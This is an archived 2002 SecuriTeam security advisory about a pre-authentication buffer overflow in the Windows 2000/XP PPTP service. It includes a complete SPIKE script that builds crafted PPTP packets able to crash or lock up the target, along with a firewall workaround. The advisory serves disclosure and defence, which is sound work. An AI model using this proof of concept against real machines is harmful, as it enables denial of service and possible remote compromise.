[NT] Microsoft PPTP Server and Client Remote Vulnerability

From: support@securiteam.com
Date: 09/30/02


From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 30 Sep 2002 10:48:59 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Microsoft PPTP Server and Client Remote Vulnerability
------------------------------------------------------------------------

SUMMARY

The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
remotely exploitable pre-authentication buffer overflow.

DETAILS

Vulnerable systems:
 * Microsoft Windows 2000 and XP running either a PPTP Server or Client.

Impact:
With a specially crafted PPTP packet, it is possible to overwrite kernel
memory.

A DoS resulting in a lockup of the machine has been verified on Windows
2000 SP3 and Windows XP.

A remote compromise should be possible deploying proper shellcode, as we
were able to fill EDI and EDX with our data.

Clients are vulnerable too, because the Service always listens on port
1723 on any interface of the machine, this might be of special concern to
DSL users that use PPTP to connect to their modem.

Solution:
As a temporary solution for the Client issue, one might firewall the PPTP
port in the Internet Connection Firewall for Windows XP.

We do not know of any solution for Windows 2000 and Windows XP PPTP
servers.

The vendor has been informed.

SPIKE:
The following SPIKE file will allow you to replicate this issue:

//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);

//hostname
s_string_variable("A");
s_binary_repeat("00",63);

//vendor
s_string_variable("A");
s_binary_repeat("00",63);

s_block_end("PPTP");

///
/// NEXT PACKET
///
///

//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 - control request
s_int_variable(0x0001,5);

//cookie
s_binary("1a 2b 3c 4d");
//type 1 - outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");

//call id
s_binary("0000");

//serial number
s_binary("0000");

//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//recieve window size
s_binary("0003");
//processing delay
s_binary("0000");

s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");

ADDITIONAL INFORMATION

The original advisory is accessible by going to:
 <http://www.phion.com/adv/index.html>
http://www.phion.com/adv/index.html.

The information has been provided by Stephan Hoffmann, Thomas
Unterleitner, and <mailto:dave@immunitysec.com> Dave Aitel.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages